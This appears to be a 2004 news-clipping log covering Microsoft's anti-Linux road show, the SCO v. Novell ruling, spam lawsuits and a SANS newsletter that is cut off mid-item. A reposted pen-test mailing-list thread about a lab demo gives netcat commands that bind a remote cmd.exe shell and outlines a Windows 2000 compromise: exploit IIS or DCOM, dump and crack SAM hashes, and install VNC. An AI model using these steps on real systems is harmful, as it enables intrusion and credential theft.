From the talk today, it seems that Microsoft have appreciated the difficulty of persuading the passionate Linux folk. One Microsoft exec described the anti-Microsoft feelings as a "jihad."

It's a term that didn't sit well with other open-sourcers. Novell's technical director, Steve Gaines, said: "There's a huge amount of passion around open source… It's far more positive; it's 'let's create alternatives' not 'let's trash something someone else has done'."

The other prong of Microsoft's rebuttal takes on security 'myths'.

Nick Barley, Microsoft's director of business marketing organization, refuted allegations that MS security was lax, saying the tools are there, but they have to be switched on. "We've spent a lot of time recently trying to educate the marketplace… work with the marketplace to help them understand what to do to protect their PC--it's not necessarily anything that's not on their PC already, it's just not enabled."

When asked the question, "Why might Linux be more secure than Windows?" in a recent silicon.com poll, the majority of respondents said it was the way the operating system was created.

Forty-one per cent said it might be more secure because of the open-source development model, 32 per cent said because it's not as widely used and is therefore less of a target and 27 per cent said it wasn't more secure, full stop.

While Microsoft does share its code with big corporations and government organizations, it's keen to keep overall control for commercial reasons--"our source code is our only intellectual property," said Barley. Microsoft also says that, as a proprietary company, it may not have an independent community looking out for flaws, but it has staff employed to exactly the same ends.

Novell's Gaines, for one, isn't concerned. "It's good news. [The road show] validates Linux as a platform."

Microsoft's Get the Facts road show will be in Edinburgh on June 17, Manchester on June 29 and Newport on July 7.

/. : Microsoft's Magical 'Myth-Busting' Tour

Slashdot | Microsoft's Magical 'Myth-Busting' Tour: "Posted by michael on Friday June 11, @05:05PM from the drive-offensively dept.Mz6 writes 'Microsoft has launched its 'Get the Facts' road show -- the tech equivalent of a politic"

Posted by michael on Friday June 11, @05:05PM
from the drive-offensively dept.
Mz6 writes "Microsoft has launched its 'Get the Facts' road show -- the tech equivalent of a political battle bus -- to tour the country and convince the wavering that Redmond is as at least cheap and as secure as its open-source rival and to spread the word that Windows is better than Linux. Nick McGrath, Microsoft's head of platform strategy, described the campaign as 'a reality check we're bringing out', aiming to tackle the 'myths' surrounding Linux. Microsoft's road show will be in Edinburgh on June 17, Manchester on June 29 and Newport on July 7."

/. : Is Finding Security Holes a Good Idea?

Slashdot | Is Finding Security Holes a Good Idea?: "Posted by michael on Friday June 11, @12:35PM from the dare-not-speak-its-name dept.ekr writes 'A lot of effort goes into finding vulnerabilities in software, but there's no re"

Posted by michael on Friday June 11, @12:35PM
from the dare-not-speak-its-name dept.
ekr writes "A lot of effort goes into finding vulnerabilities in software, but there's no real evidence that it actually improves security. I've been trying to study this problem and the results (pdf) aren't very encouraging. It doesn't look like we're making much of a dent in the overall number of vulnerabilities in the software we use. The paper was presented at the Workshop on Economics and Information Security 2004 and the slides can be found here (pdf)."

GROKLAW: Novell Wins Remand Contest- Case Stays in Federal Court - It's Copyright Proof Time

GROKLAW: "Thursday, June 10 2004 @ 06:39 PM EDTJudge Kimball, as he promised, has issued his order* on the Novell case. The big news is that SCO lost its fight to get the case sent back to state co"

Thursday, June 10 2004 @ 06:39 PM EDT

Judge Kimball, as he promised, has issued his order* on the Novell case. The big news is that SCO lost its fight to get the case sent back to state court. SCO's entire theory of the case as a contract issue only went out the window, and they are now squarely in a pure copyright fight, which is the last thing they wanted. They will now have to prove that they own the copyright they are using to threaten end users like AutoZone. Kimball agrees with Novell that there are serious questions about whether the agreement even as amended by Amendment 2 is sufficient to be a copyright conveyance, and that means it stays in federal court. He retains jurisdiction. Remember all the experts who told us SCO might win this? They were mistaken.

Judge Kimball says he can't grant Novell's motion to dismiss at this stage, but he clearly has a leaning, and it isn't in SCO's direction. It's just that on a motion to dismiss, the judge is required to construe all facts in the light most favorable to the party whose case might be dismissed, the non-moving party, and on the Motion to Dismiss, that would be SCO, and as a matter of law, he can't grant the motion to dismiss in totality, because while "Novell has raised persuasive arguments as to whether a sufficient writing exists" without more evidence, he can't rule on the sufficiency of the agreement yet.

As we expected, he says SCO didn't plead the damages part adequately and he gives them 30 days to try, try again. I doubt they will be able to do it.

The conclusion is this:

"For the reasons stated above, Plaintiff's Motion to Remand is DENIED, and Defendant's Motion to Dismiss is DENIED as to Plaintiff's pleading of falsity and GRANTED as to Plaintiff's pleading of special damages. Plaintiff is granted 30 days from the date of this Order to amend its Complaint to more specifically plead special damages."

This is a huge loss for SCO. It's the kind of ruling that normally gets the plaintiff settling, out of fear of what the judge might do next, like in the BSDi case, when Debevoise's ruling on a motion got the parties working things out fast. I love this judge.

This just isn't SCO's day.

*Note it may take a few minutes for the PDF to make it to ibiblio's servers. I didn't want you to have to wait to hear the news.

LINUX: SCO Loses Attempt to move Novell Case to State Court

SCO Loses Attempt to move Novell Case to State Court

VUN: Microsoft Internet Explorer URL Local Resource Acc

SecurityFocus HOME Vulns Info: Microsoft Internet Explorer URL Local Resource Acc

VUN: Microsoft Internet Explorer Modal Dialog Zone Bypa

SecurityFocus HOME Vulns Info: Microsoft Internet Explorer Modal Dialog Zone Bypa

VUN: Microsoft ISA Server 2000 Site And Content Rule By

SecurityFocus HOME Vulns Info: Microsoft ISA Server 2000 Site And Content Rule By

LINUX: Linux supporters waging a "jihad", says Microsoft exec



Jo Best
silicon.com
June 11, 2004

Microsoft has launched its 'Get the Facts' road show – the tech equivalent of a political battle bus – to tour the country and convince the wavering that Redmond is as at least cheap and as secure as its open-source rival.

Nick McGrath, Microsoft's head of platform strategy, described the campaign as "a reality check we're bringing out", aiming to tackle the "myths" surrounding Linux.

One of the myths that's getting Microsoft's goat is the term 'free'. At the London leg of the road show, not one attendee raised their hand when asked if they believed Linux was free – after all, Linux vendors aren't giving their Linux products away for nothing.

Meta Group analyst Philip Dawson said consumers should bear in mind that while Linux itself is free, that's not the whole story. "It's a free component – it's not a free platform, it's not a free service – it's a free component," he said.

But what about the old adage that it's not free as in free lunch but more free as in freedom of speech?

From the talk today, it seems that Microsoft have appreciated the difficulty of persuading the passionate Linux folk. One Microsoft exec described the anti-Microsoft feelings as a "jihad".

It's a term that didn't sit well with other open-sourcers. Novell's technical director, Steve Gaines, said: "There's a huge amount of passion around open source… It's far more positive; it's 'let's create alternatives' not 'let's trash something someone else has done'."

The other prong of Microsoft's rebuttal takes on security 'myths'.

Nick Barley, Microsoft's director of business marketing organisation, refuted allegations that MS security was lax, saying the tools are there, but they have to be switched on. "We've spent a lot of time recently trying to educate the marketplace… work with the marketplace to help them understand what to do to protect their PC – it's not necessarily anything that's not on their PC already, it's just not enabled."

When asked the question, 'Why might Linux be more secure than Windows?', in a recent silicon.com poll, the majority of respondents said it was the way the operating system was created.

Forty-one per cent said it might be more secure because of the open-source development model, 32 per cent said because it's not as widely used and is therefore less of a target and 27 per cent said it wasn't more secure, full stop.

While Microsoft does share its code with big corporations and government organisations, it's keen to keep overall control for commercial reasons - "our source code is our only intellectual property," said Barley. Microsoft also says that, as a proprietary company, it may not have an independent community looking out for flaws, but it has staff employed to exactly the same ends.

Novell's Gaines, for one, isn't concerned. "It's good news. [The road show] validates Linux as a platform."

Microsoft's Get the Facts road show will be in Edinburgh on 17 June, Manchester on 29 June and Newport on 7 July.

LINUX: Leader: Linux "jihad"? Less hysteria please...



Leader: Linux "jihad"? Less hysteria please...
silicon.com
silicon.com
June 11, 2004

Microsoft has bent over backwards to present itself as reasonable when it comes to the proprietary versus open-source software debate - at least until recently.

'Linux is a great competitor but we think we do a better job' is the standard line coming out of Redmond. This is a fine and sensible stance for any commercial enterprise – so why this talk of 'jihad' at Microsoft's Get the Facts road show?

At said event, which is intended to convince the world that Windows is as cheap and secure as its open-source rival, a Microsoft exec got up in front of a crowd of journalists and described the anti-Microsoft feelings of Linux supporters as a "jihad".

It's not the first time Microsoft has had a political dig at Linux. The partly Microsoft-funded Alexis de Tocqueville institution brought out a report claiming Linux is less secure than Windows and therefore any government agency using it is threatening national security.

SCO – which has links to Redmond – made similar noises recently, saying in a letter to Congress that open source "has the potential to apply our nation's enemies or potential enemies with computing capabilities that are restricted by US law".

It's not a good look for Microsoft – the world's biggest software company can't be seen both to be embracing the challenge of Linux while at the same time using such inflammatory terms as 'jihad' when discussing its rival.

The Linux community is undeniably passionate about its chosen operating system – for some, it almost approaches a religion - and Microsoft-bashing does form a part of that for many.

But that's not who Microsoft should be trying to persuade - those people will never be won over to the Microsoft cause, no matter how many road shows and studies are put in front of them.

It's the software platform-agnostic businesspeople mulling over which OS to choose for their commercial applications that Microsoft should be after – and using pejorative language certainly won't help to accomplish that goal.

Businesspeople are precisely the type who aren't interested in ideological arguments. They want to know what's cost-effective, reliable and effective in a corporate environment – not whether or not they can bring down 'an evil empire' by tinkering with a few lines of code.

If anything, Microsoft's behaviour at the road show reveals that the company feels threatened by the penguin party – and business can smell fear from a mile away.

If Microsoft really wants to convince people that its software is so great, it should stick to doing what it does best – making products for a mass market and pouring advertising money into telling the world about them.

M$: MS sues 200 for spamming

SecurityFocus HOME News: MS sues 200 for spamming: "MS sues 200 for spamming By Lucy Sherriff, The Register Jun 11 2004 8:25AM Click here for Astaro Internet Security!Microsoft has filed eight lawsuits in the US against nearly 200 a"

MS sues 200 for spamming

By Lucy Sherriff, The Register Jun 11 2004 8:25AM
Click here for Astaro Internet Security!
Microsoft has filed eight lawsuits in the US against nearly 200 accused spammers, saying that the defendants had used false information to conceal themselves, and had deceived consumers. Each of the lawsuits "names" at least 20 unidentified defendants, as well as one John Hites, identified by anti-spam campaigners at Spamhaus as one of the world's ten most prolific spammers.

Microsoft is seeking injunctions against each defendant, using the CAN-Spam act, and could be awarded up to $1m per spammer in civil fines. THe company said it hopes to unmask the anonymous spammers through the legal discovery process.

Microsoft filed its first suits against unsolicited mailers in June last year (2003), and is now involved in more than 80 such cases around the world. So far, its legal actions have resulted in four settlements, two defendants being declared bankrupt and five judgments for Microsoft.

"We're raising the stakes, we're making it more expensive for spammers," Tim Cranton, a senior lawyer at Microsoft said. "A lot of the established spammers are realizing that it's much harder to operate."

Although any efforts made in the fight against spammers are to be applauded, anyone with an e-mail account will testify that the effect on the amount of spam arriving in inboxes has been zero. Frank Gorman, former legal counsel for the Federal Trade Commission's Bureau of Consumer Protection, told The Washington Times: "It's not going to make an impact by itself, but you have to approach it from every angle."

In January this year, Bill Gates, Microsoft chairman, outlined a three-step programme to eliminate spam within two years: he proposed a system whereby senders would have to pay a digital stamp fee if recipients considered the mail to be spam.

The company has also introduced a whitelist scheme that will make its Hotmail database available to third parties willing to pay $20k to avoid the spam filters, provided they comply with Microsoft's guidelines. ®

SEC: Hacking Demo and Test Lab

raza sharif Fri, Jun 11, 2004 at 7:41AM
To: pen-test@securityfocus.com


Hi Folks ,

Im doing some advanced Hacking Demos for management and also Corporates etc.

I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.

Im using Webdav and other exploits that all basically should spawn a shell using netcat.

Im using XP as my attacking machine.

Prob at the moment is Netcat will not spawn a shell regardless of what i try.

Any ideas ? i checked the install it is windows 2000 500.1295 no reference to service packs etc. it's a default install.

Also what are good demo's etc to run to show real hacking on windows 2000 , iis etc..that i can get to work

thanks

Raza

Raza@raza.demon.co.uk
Martin Wasson Fri, Jun 11, 2004 at 11:33AM
To: raza sharif
Cc: pen-test@securityfocus.com


Raza,
A few things. I wouldn't really call this advanced. Why are you hacking
from XP instead of Linux? Get yourself a Linux box. These exploits of
which you write do not spawn shells using netcat. Netcat can bind shells
after you install it. You have to pop the Win2k box first, with something
like oc192-dcom.c. This exploit will get you a shell, then have it GET
(tftp) the files (like netcat) from your Linux box. Once the win2k box has
received nc.exe, run "nc -L -p 1234 -e cmd.exe" AFTER you've started netcat
on you Linux box (nc 1234).

Does that help?

Regards,

Marty Wasson, CISSP, CEH, IAM
Sr. Information Security Analyst
Global Information Security
MasterCard International
(636) 722-2372
martin_wasson@mastercard.com

"Men occasionally stumble over the truth, but most of them pick themselves
up and hurry off as if nothing ever happened." Winston Churchill

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

CONFIDENTIALITY NOTICE
This E-mail message and any documents which accompany it are intended only
for the use of the individual or entity to which addressed, and may contain
information that is privileged, confidential or exempt from disclosure
under applicable law. If the reader is not the intended recipient, any
disclosure, distribution or other use of this E-mail message is prohibited.
If you have received this E-mail message in error, please notify the sender
immediately. Thank you.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

raza sharif
co.uk> cc: (bcc: Martin Wasson/STL/MASTERCARD)
Subject: Hacking Demo and Test Lab
06/11/2004 06:41
AM
[Quoted text hidden]

-----------------------------------------
CONFIDENTIALITY NOTICE
This e-mail message and any attachments are only for the use of the intended recipient and may contain information that is privileged, confidential or exempt from disclosure under applicable law. If you are not the intended recipient, any disclosure, distribution or other use of this e-mail message or attachments is prohibited. If you have received this e-mail message in error, please delete and notify the sender immediately. Thank you.

Grissett, Chris CONT Ciber Fri, Jun 11, 2004 at 10:49AM
To: raza sharif , pen-test@securityfocus.com
Try this command on the remote machine
nc -l -p 23 -t -e cmd.exe

This allows nc to listen on port 23 for connections. When a connection is
made it will spawn a cmd[dos] shell, or whatever program you want to exec.
Hope that helps. If that fails, you can really impress the execs by using
knoppix-std (http://knoppix-std.org), to do all your hacking demos. Or if
you'd like, you could give me access to your lab, and Id do it for you. I'm
kidding, of course I couldn't do that, plus it would violate numerous laws
and ethics :) Are you familiar with linux?

Christopher Grissett
Security Analyst
Network Enterprise Security Team
[Quoted text hidden]
Victor Chapela Fri, Jun 11, 2004 at 1:59PM
To: raza sharif , pen-test@securityfocus.com
I am not sure about VMWare, I also had some problems running demos
consistently and decided to use a separate machine.

I usually do my demos with a similar configuration XP -> 2000.

A good 5 min sketch is:
- get a remote shell using Jill, iis5hack or dcomexploit
- You end up as NT Authority/SYSTEM in all cases, therefore you can add
yourself as an administrator
- connect to the admin$ share using your new credentials
- dump the SAM file with pwdump3
- crack some hashes using john
- copy winvnc to system32
- add your vnc password to the remote registry
- install and start winvnc remotely
- start a VNC session

Even though you will rarely need to install vnc while pen testing, I have
found that for demos it is a very good way to get the point through.

Good luck

Victor
[Quoted text hidden]
Grissett, Chris CONT Ciber Fri, Jun 11, 2004 at 10:59AM
To: raza sharif , pen-test@securityfocus.com
I guess I should have included a working example:

Assuming that you already have nc on the 2000 box, run this command:

nc -l -p 23 -t -e cmd.exe

Then on your xp box run this command:

nc xxx.xxx.xxx.xxx 23

replace the x's with the ip of the 2000 server box. The 23 is for the port
you assigned it earlier.

Oh, when you installed 2000 server, what type of connection did you choose.
You should choose to have 2000 server have direct access to the host's
Ethernet card and its connections. Do you have any personal firewalls
running at all? Are these two machines connected via a hub or switch.
[Quoted text hidden]

LINK: Pocket C# @ miFki.ru

Pocket C# @ miFki.ru

Welome to home of Pocket C# project - C# compiler running under Windows CE!

Overview

Pocket C# is port of C# compiler from DotGNU project to Windows CE. DotGNU contains open-source runtime, compiler, tools and many other things to make free cross-platform .NET environment. I took only compiler and several required tools and ported them with some modifications to WinCE platform. It's quite easy to use and I'm going to make IDE for more comfortable usage.

What all of this means? In a few words it means that now you can develop and build applications using standard .NET CF and C# right on your pocket device. It's really easy, you almost don't need to do anything manually - just write your code and project file and then build it with one tap!

Please visit public discussion group for latest info, downloads and help. And click here for more information about DotGNU.

News

10.06.04 - Small update to version 1.01 and more documentation added to this site.

09.06.04 - First public working version released.

Components

* C# compiler (cscc-cs)
* IL (intermediate language) assembler (ilasm)
* Linker (ilalink)
* Wrapper for these tools (cscc)
* XML based build tool (csant)
* Runtime libraries - standard Microsoft .NET CF
* Sample applications


Future plans

* some modifications for easier usage in PocketPC envoronment
* IDE
* maybe support for J# and VB.NET

LINUX: Showdown with the Linux Gang

Linux News: Open Source: Showdown with the Linux Gang

LINUX: Does Prentice Hall Really Own Linux?

NewsForge | Does Prentice Hall Really Own Linux?

Title Does Prentice Hall Really Own Linux?
Date 2004.06.11 7:00
Author warthawg
Topic Linux
http://software.newsforge.com/article.pl?sid=04/06/11/1139234

Bruce Perens writes "A recent report by Ken Brown of the "Alexis de Toqueville Institute" casts aspersions upon Linus Torvalds as creator of the Linux operating system kernel. The report attributes ownership of Linux to Prentice Hall PTR as publishers of Andrew Tannenbaum's book Operating Systems: Design and Implementation. In the book, Tannenbaum provided the source for an educational toy OS called Minix.

Mr. Brown is obviously not aware of my role as series editor of the Bruce Perens Open Source Series at Prentice Hall PTR. With ten books published so far, this series is unique in that not only are the books about Open Source software, the text of the books is under an Open Source license. They can be copied and redistributed freely in the same manner as the Linux kernel - it's even legal to sell the copies. The series has shown that a publisher can be commercially successful with Open Source text, as IBM, Red Hat, and other companies have been successful with Open Source software.

Like all technical book publishers, Prentice Hall is in the business of distributing ideas. They have copyrighted their books, but the express purpose of those books is for readers to use the ideas that their text communicates. Before Linus Torvalds created Linux, one of the ways he learned to build operating systems was by reading Tannenbaum's book and working with the Minix source code. Authors and publishers are proud of the role our books have played in developing the professional skills of Torvalds and the Open Source developer community. We should not, do not, and can not claim as our own the creations of the many millions of people who use our books as a reference in their work every day.

Regarding Brown's other assertions, it should be sufficient to point out that many of the people he quotes have published detailed refutations of Brown's text. Most interesting is that of Tannenbaum himself, parts 1, 2, and 3, that of the young programmer Brown hired to compare Linux and Minix, and scientist Illka Tuomi.

A recent title in my series, Understanding the Linux Virtual Memory Manager, is meant to be used directly by the Linux kernel developers in their work, and uses the Linux source code as a reference for tomorrow's computer scientists. This illustrates the synergistic relationship that a publisher willing to embrace Open Source can have with the developer community. I look forward to the continuation of that relationship.

Bruce Perens
"
Links

1. "Bruce Perens" - mailto:bruce@perens.com
2. "Operating Systems: Design and Implementation" - http://phptr.com/title/0136386776
3. "Bruce Perens Open Source Series" - http://phptr.com/perens
4. "1" - http://www.cs.vu.nl/~ast/brown/
5. "2" - http://www.cs.vu.nl/~ast/brown/followup/
6. "3" - http://www.cs.vu.nl/~ast/brown/rebuttal/
7. "young programmer Brown hired to compare Linux and Minix" - http://www.cs.vu.nl/~ast/brown/codecomparison/
8. "Illka Tuomi" - http://www.firstmonday.org/issues/issue9_6/tuomi/index.html
9. "Understanding the Linux Virtual Memory Manager" - http://www.informit.com/title/0131453483

SEC: SANS NetworkBits June 11, 2004 Vol. 1, Num. 10

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

***********************************************************************
SANS NetworkBits June 11, 2004 Vol. 1, Num. 10
***********************************************************************

NEWS

-- RIM, NTP in Court Again Over Patents
-- Telecom Sharing Decision Upheld
-- Broadband Use Rises as Dial-Up Declines
-- Wireless on the Upswing Straining Corporate Networks
-- Debate Highlights Vendors' Differences

STANDARDS

-- CWA: VoIP is a Telecommunication Service

PRODUCTS

-- MPLS-Enabled Metro Ethernet Switch Introduced
-- Foundry Adds IPv6 Support to Router and Switch
-- Wi-Fi Kits Launched by Broadcom and Netgear
-- Uncertified WiMax Kit Launched by Alvarion
-- SonicWall Launches New Wireless Solution

VULNERABILITIES

-- Cisco-Linksys Wireless Hole Not as Serious as Presented
-- Telstra Says Network Intrusions are on the Rise

ISP NEWS

-- ISP Offers Block for Accessing Child Porn
-- BellSouth Upgrades its Ethernet Services
-- NTL Ireland Upgrades Its Network
-- Telstra Looks Toward IVR
-- Worms Costing Firms Millions

TELECOM NEWS

-- Trials Set for VoIP in Asia and Europe
-- Record Set for IP Transmission Speeds

TUTORIAL

-- All You Need to Know About Domain Security

WHITE PAPER

-- Enabling a Successful Wireless Enterprise

OPINION

-- Free Phone Calls. Too Good to Last?
-- Is Open Source IP Telephony Ready For Prime Time?

HOW'S BUSINESS

FEDERAL REGISTER

-- FCC Establishes Office of Homeland Security
-- FCC Seeks Input regarding Broadband Data Gathering Program
-- FCC on Fixed-Wireless Telecommunications Antennas

STOCK QUOTES

******************* Sponsored by SANS SCHOOL STORE ********************

Check out our School Store for recently released books on Business Law,
Solaris Securing Solaris, Computer Security Incident Handling and
exclusive books and merchandise. Also, check out our section on
recommended books written by SANS faculty, PDF samples on our
Step-By-Step Guides, and current specials on Oracle Security, 7-Pack
Guides, and T-shirts. For more information go to
https://store.sans.org/

***********************************************************************
This Week's Featured Security Training Program: SANSFIRE 2004
Monterey, CA, July 5-13, 2004

SANSFIRE offers you 14 immersion training tracks in one of the most
beautiful and romantic places in America. Phenomenal training for
auditors who want to master the challenges of security auditors, for
managers who want to build a great security program, for security
beginners who want to get a fast start, and, of course, the only place
to go for technologists who want to master the most current methods for
protecting systems and networks. SANSFIRE also offers lots of evening
programs, extra one-day classes ranging from security business law to
cyberwarrior training, and vendor exhibits, too.

Register soon to get a seat at your choice of courses.
http://www.sans.org/sansfire2004
***********************************************************************

NEWS

-- RIM, NTP in Court Again Over Patents
(07 June 2004)
Judges from the Court of Appeals for the Federal Circuit in Washington,
D.C. will hear arguments and decide whether an injunction to keep
Research in Motion (RIM) from selling Black Berry handhelds, software
and services in the U.S. should be upheld. NTP filed a complaint in
November 2001 charging that RIM's Black Berry products and services
violate at least five NTP patents granted them by the U.S. Patent and
Trademark Office (USPTO) covering the use of radio-frequency wireless
communications in e-mail systems. In August 2003, the U.S. District
Court for the Eastern District of Virginia ruled in NTP's favor placing
an injunction on certain Black Berry products and services.
Subsequently, RIM was granted a stay on the injunction until the case
could be heard in Appeals Court.
http://www.nwfusion.com/news/2004/0607blackpaten.html

-- Telecom Sharing Decision Upheld
(04 June 2004)
The motion filed by the Federal Communications Commission to stay a U.S.
Court of Appeals for the District of Columbia Circuit injunction
regarding telecom sharing was denied. Therefore, the court's decision
in March 2004 which overturned most of the FCC's "triennial review
decision" stands. The decision allows negotiations for competitors to
continue using part of the networks put in place by incumbents.
http://www.nwfusion.com/edge/news/2004/0604appeacourt.html

-- Broadband Use Rises as Dial-Up Declines
(03 June 2004)
According to figures published by British telecommunications regulator
Ofcom, broadband usage has steadily risen, while dial-up has declined.
For example, the percentage of small businesses using broadband
increased from 35 percent to 37 percent since November 2003. However,
a senior technology consultant for Sophos, Graham Cluley, asserts
broadband is a "real problem" since always-on connections bring greater
risks of sending spam and propagating viruses. ISPs selling broadband
should take a proactive approach to educating their customers, he
states.
http://news.zdnet.co.uk/communications/broadband/0,39020342,39156630,00.htm
[Editor's Note (Triulzi): The UK had a major catch-up job on broadband
and the initial strategy on the part of BT which owns almost all of the
local-loops was such that it required "triggers" to DSL-enable
exchanges. This meant that it took a very long time for broadband to
be available everywhere. This changed recently when the "trigger"
mechanism was removed and all exchanges became eligible for
DSL-enabling. On the anti-virus aspect of the issue security
professionals have been hammering the point to death, to the level that
there is perhaps almost a refusal on the part of the average Internet
user to believe that he is such a great risk to the community.
Unfortunately it isn't just the ISP's which need to educate customers,
customers should also start demanding better software and better
operating systems which are not so vulnerable.]

-- Wireless on the Upswing Straining Corporate Networks
(31 May 2004)
The benefits of introducing mobile and wireless technology to corporate
networks are compelling. As the use of these technologies increases,
so does the likelihood for companies to see unauthorized WLAN
connections on their networks. According to Marc Simms, director of IT
at Shared PET Imaging LLC, "The problem of rogue employees is
maddening." When end users bring in their own mobile equipment, the
issue of security comes into play, notes Simms. He suggests IT managers
sniff out any unauthorized WLANS as well as starting to set standards.
http://www.computerworld.com/mobiletopics/mobile/story/0,10801,93530,00.html
[Editor's Note (Triulzi): Unfortunately the solution to rogue "wireless"
technology is far from being cheap. On the contrary the best solutions
(e.g. ethernet port authentication to prevent rogue access points being
connected to the main network) are often expensive to roll-out
pervasively. This means that they are rolled-out in a hap-hazard
fashion making them ineffective. Sniffing WLANs is a good reactive
measure but the only safety lies in being proactive and making it
particularly arduous to install rogue WiFi equipment.]

-- Debate Highlights Vendors' Differences
(31 May 2004)
At the CeBit America trade show, two established wired-network vendors,
Cisco and Extreme Networks, and two wireless start-ups, Airespace and
Aruba Wireless Networks, highlighted their differences as it relates to
how wireless networking should be done. While Cisco drew attention to
its "integrated approach" through the use of its enhancements to the
high-end Catalyst 6500 switch, Aruba's vice president of marketing
Keerti Melkote highlighted their preference for a "thin" access point
with centralized management. Vipin Jain, vice president and general
manager of LAN access at Extreme Networks, noted that his company had
introduced the idea of an integrated approach more than 12 months ago.
In addition, the four vendors disagreed on the need for a site survey.
http://www.nwfusion.com/news/2004/0531wlancebitshowdown.html

*************************** SPONSORED LINKS ***************************
Privacy notice: These links may redirect to non-SANS web pages.

(1) Browse through a variety of course books and benchmarks
at:
http://www.sans.org/click.php?id=471

(2) Want to go on a search and destroy mission against spybots?
Home in on:
http://www.sans.org/click.php?id=472

(3) Looking for step-by-step guides on various topics?
Check out:
http://www.sans.org/click.php?id=473

***********************************************************************

STANDARDS

-- CWA: VoIP is a Telecommunication Service
(02 June 2004)
The Communications Workers of America (CWA) union has joined the debate
over whether voice over Internet Protocol (VoIP) should be classified
as a telecommunications service, thus subject to the same regulations
as other telephone services, or as a date service, free of most
regulation and taxes, by petitioning the Federal Communications
Commission (FCC) to treat VoIP as a telecommunication service. Their
stand separates them from industry and business which advocates VoIP be
treated as a data service.
http://www.networkingpipeline.com/voicedata/21400974
Related Article: U.S. Groups Lobby Over VoIP Regulation
http://www.theregister.co.uk/2004/06/03/us_voip_fcc/

PRODUCTS

-- MPLS-Enabled Metro Ethernet Switch Introduced
(07 June 2004)
A new Ethernet switch, the 7450 Ethernet Service Switch, now available
in two configurations, using Multi-Protocol Label Switching (MPLS)
technology, has been introduced by Alcatel. According to Vinay Rathore,
director of strategic marketing for Alcatel's fixed communications
group, asserts, "The new switch is built to deliver high quality
packet-based services with a high amount of predictability."
http://www.networkingpipeline.com/news/21401931

-- Foundry Adds IPv6 Support to Router and Switch
(04 June 2004)
Foundry, a networking equipment vendor, has added IPv6 support to its
NetIron 40G router and its BigIron MG8 switch. At the Network + Interop
tradeshow, Foundry demonstrated both the router and switch showcasing
its capability to route up to 480 million IPv6 packets per second. The
40G router and the BigIron MG8 switch both support 10-Gigabit Ethernet.
http://news.zdnet.co.uk/communications/networks/0,39020345,39156800,00.htm

-- Wi-Fi Kits Launched by Broadcom and Netgear
(03 June 2004)
Broadcom and Netgear have both launched products to make high-speed
wireless networks easier to deploy. Broadcom introduced "Airforce
BCM5350," a "system on a chip" that supports 802.11g, Ethernet, and VPN
security. Netgear introduced its WG302 Prosafe 802.11g wireless access
point capable of being boosted from 54Mbps to 108Mbps.
http://news.zdnet.co.uk/communications/wireless/0,39020348,39156552,00.htm

-- Uncertified WiMax Kit Launched by Alvarion
(02 June 2004)
Despite not being certified as such, a WiMax product, BreezeMAX 3500,
was launched by wireless hardware manufacturer Alvarion. Alvarion
maintains that even though the emerging WiMax technology has not yet
been officially certified, telecoms are eager to be on the path to
WiMax. Carlton O'Neal, Alvarion's vice-president of marketing admits
there is a risk that they will have to upgrade the equipment when the
final WiMax specifications come out.
http://news.zdnet.co.uk/communications/wireless/0,39020348,39156528,00.htm
[Editor's Note (Triulzi): One hopes that the "Prosafe" Netgear equipment
lacks the hilarious backdoor recently published for its other WiFi
equipment not to mention the even funnier fix (changing the "secret"
login from admin to adminstar...).]

-- SonicWall Launches New Wireless Solution
(01 June 2004)
The Distributed Wireless Solution, which offers smaller companies a way
to integrate wireless and wired network security, was launched by
SonicWall. According to Jeff Wilson, principal analyst at Infonetics,
"Wireless has changed the way we work, but network administrators are
struggling to integrate wireless into their existing security
infrastructures." SonicWall's 'governing' appliance provides a central
point from which to deploy security policy and authentication rules.
http://news.zdnet.co.uk/communications/wireless/0,39020348,39156405,00.htm

VULNERABILITIES

-- Cisco-Linksys Wireless Hole Not as Serious as Presented
According to Alan Rateliff, who first posted a warning on the Bugtraq
discussion about a security hole in Cisco's Linksys WRT54G wireless
routers, has stated that after several tests, he found that the devices
were not vulnerable in their default configuration. "The exposure on
this is not as bad as the (discussion) on Bugtraq made it seem. I can't
account for the results of the first test, but at this point that's
irrelevant. What's relevant now is that "out of box" home users are
safe," he asserts.
http://www.nwfusion.com/news/2004/0607confuse.html
Related Article: Linksys Flaw Opens Door to Home Networks
http://news.zdnet.co.uk/internet/security/0,39020375,39156878,00.htm

-- Telstra Says Network Intrusions are on the Rise
(31 May 2004)
According to Ted Pretty, managing director of technology and innovation
at Telstra, network intrusions and denial of service attacks against
Telstra have increased 1,500 percent in the last few years. He notes
that as the use of Internet Protocol Virtual Private Networks (IPVPNs)
increases, so will network attacks. Pretty predicts that doing business
over the telephone will be a thing of the past as IPVPN's become more
widespread. However, he asserts that transmitting data and voice over
the air is not as reliable as transfer over cable.
http://www.computerworld.com.au/index.php?id=1468037417&eid=-255
31/05/2004 08:51:33

ISP NEWS

-- ISP Offers Block for Accessing Child Porn
(07 June 2004)
British Telecom's (BT's) one million broadband Internet customers will
be getting an elaborate software filter, known as Cleanfeed, which will
block access to a list of suspected child porn sites. The "block list"
will be compiled by the Internet Watch Foundation. According to Pierre
Danon, head of BT retail services, "In the U.K., because it is illegal
to view these [child porn] images, we can stop an illegal activity."
http://news.zdnet.co.uk/internet/security/0,39020375,39156894,00.htm
[Editor's Note (Triulzi): Despite it sounding like a marketing
initiative this is actually a move which has been appreciated widely as
a responsible and timely solution to a problem which is strongly felt
in the UK and it should not be compared with AOL's parental control
services.]

-- BellSouth Upgrades its Ethernet Services
(04 June 2004)
Atlanta-based BellSouth Corp. has a new premium-level addition to its
Metro Ethernet Service that includes the ability to prioritize voice
traffic on IP-based metropolitan-area networks (MANs). It also provides
business-continuity capabilities and allows users to add bandwidth in
smaller increments than they were formerly able to do. BellSouth is
offering its new service in Atlanta, New Orleans, Miami, Jacksonville
and Raleigh, with plans to add four more metropolitan areas later this
year.
http://www.computerworld.com/networkingtopics/networking/story/0,10801,93647,00.html

-- NTL Ireland Upgrades Its Network
(03 June 2004)
NTL will be able to deliver broadband to more than 100,000 homes in
Ireland as the result of an upgrade of its cable network. NTL is
expected to spend 100 million Euro on the upgrade. In addition, NTL
Ireland has announced a series of price changes for its existing
broadband products.
http://www.theregister.co.uk/2004/06/03/ntl_ireland_network/

-- Telstra Looks Toward IVR
(02 June 2004)
Although Australia remains two years behind the U.S. in adopting
interactive voice recognition (IVR) technology, Telstra expects IVR
